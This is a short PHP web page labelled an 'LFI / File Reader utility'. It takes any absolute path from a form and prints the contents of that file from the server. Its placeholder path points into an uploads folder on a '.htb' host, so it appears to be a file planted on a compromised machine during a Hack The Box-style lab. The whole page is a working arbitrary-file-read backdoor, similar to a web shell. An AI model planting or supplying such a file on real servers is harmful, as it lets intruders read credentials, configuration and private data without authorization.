📖 File Reader
<!DOCTYPE html>
<html>
<head>
<title>LFI / File Reader utility</title>
<style>
body { font-family: monospace; background-color: #1e1e1e; color: #d4d4d4; padding: 20px; }
input[type="text"] { width: 80%; padding: 8px; margin-bottom: 10px; background-color: #2d2d2d; color: #fff; border: 1px solid #555; }
input[type="submit"] { padding: 8px 15px; background-color: #007acc; color: white; border: none; cursor: pointer; }
input[type="submit"]:hover { background-color: #005999; }
pre { background-color: #252526; padding: 15px; border: 1px solid #444; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word; }
.error { color: #f44747; font-weight: bold; }
.success { color: #4CAF50; }
</style>
</head>
<body>
<h2>Local File Reader</h2>
<form method="POST">
<label for="filepath">Enter Absolute File Path:</label><br>
<input type="text" name="filepath" id="filepath" placeholder="/www/wwwroot/hljrlsj.htb/public/uploads/file/20260302/aaa6cc485c2b7a091f9b8b93334ee020.php" required>
<br>
<input type="submit" value="Read File">
</form>
<hr>
<?php
// Check if the form was submitted and the filepath is not empty
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['filepath'])) {
$path = $_POST['filepath'];
echo "<h3>Results for: <span class='success'>" . htmlspecialchars($path) . "</span></h3>";
// Check if the file exists on the server
if (file_exists($path)) {
// Check if the web server user (www-data) has permission to read it
if (is_readable($path)) {
$content = file_get_contents($path);
// Display the raw content safely
echo "<pre>" . htmlspecialchars($content) . "</pre>";
} else {
echo "<p class='error'>Error: The file exists, but the web user does not have read permissions.</p>";
}
} else {
echo "<p class='error'>Error: File not found at the specified path. Check your spelling or directory structure.</p>";
}
}
?>
</body>
</html>